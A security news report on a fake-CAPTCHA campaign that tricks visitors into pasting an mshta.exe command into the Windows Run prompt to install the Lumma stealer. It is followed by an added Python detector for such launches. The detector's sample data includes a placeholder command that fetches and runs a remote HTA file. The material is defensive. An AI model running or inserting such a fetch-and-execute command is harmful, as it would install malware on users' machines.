Cybersecurity researchers have uncovered a malware campaign that uses fake CAPTCHA verification checks to distribute the Lumma information stealer. The global campaign targets various sectors, including healthcare, banking, and notably telecoms, with a significant number of victims across countries such as the U.S., Argentina, and the Philippines. The attack begins when a visitor reaches a compromised site and is led to a disguised CAPTCHA page that instructs them to execute a command that downloads the malware. Because the download happens outside the browser, the technique sidesteps browser defenses and complicates detection.
The attack chain begins when a victim visits a compromised website, which directs them to a bogus CAPTCHA page that specifically instructs the site visitor to copy and paste a command into the Run prompt in Windows that uses the native mshta.exe binary to download and execute an HTA file.
By downloading and executing malware in this way, the attacker avoids browser-based defenses, since the victim performs all of the necessary steps outside of the browser context.
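A detection check for the behaviour described above, added here as an example and not code from the original report: it flags process-creation events where mshta.exe is launched from the user's shell (explorer.exe, the parent when a command is typed into the Run prompt) with a remote URL on its command line. The event fields follow the Sysmon Event ID 1 naming, and the sample events and URL are constructed placeholders.

```python
"""Flag mshta.exe launches matching the fake-CAPTCHA / Run-prompt pattern."""
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style
# field names), not real telemetry. The URL is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/verify.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Local HTA run by an installer: legitimate-looking, should not fire.
    {"Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Program Files\Vendor\setup.hta",
     "ParentImage": r"C:\Program Files\Vendor\installer.exe"},
    # Unrelated process, should not fire.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# explorer.exe is the parent process when a user pastes into Win+R (Run).
USER_SHELL_PARENTS = {"explorer.exe"}


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious_mshta(event: dict) -> bool:
    """True when mshta.exe fetches remote content and was started from
    the interactive shell, the chain the fake-CAPTCHA page relies on."""
    if _basename(event.get("Image", "")) != "mshta.exe":
        return False
    parent = _basename(event.get("ParentImage", ""))
    has_url = bool(URL_RE.search(event.get("CommandLine", "")))
    return has_url and parent in USER_SHELL_PARENTS


def find_suspicious(events):
    """Filter a list of process-creation events down to matching ones."""
    return [e for e in events if is_suspicious_mshta(e)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", hit["CommandLine"], "parent:", hit["ParentImage"])
```

In production the same logic maps to an EDR or SIEM rule on process-creation telemetry; pairing it with a review of the user's RunMRU history helps confirm the command was pasted by hand.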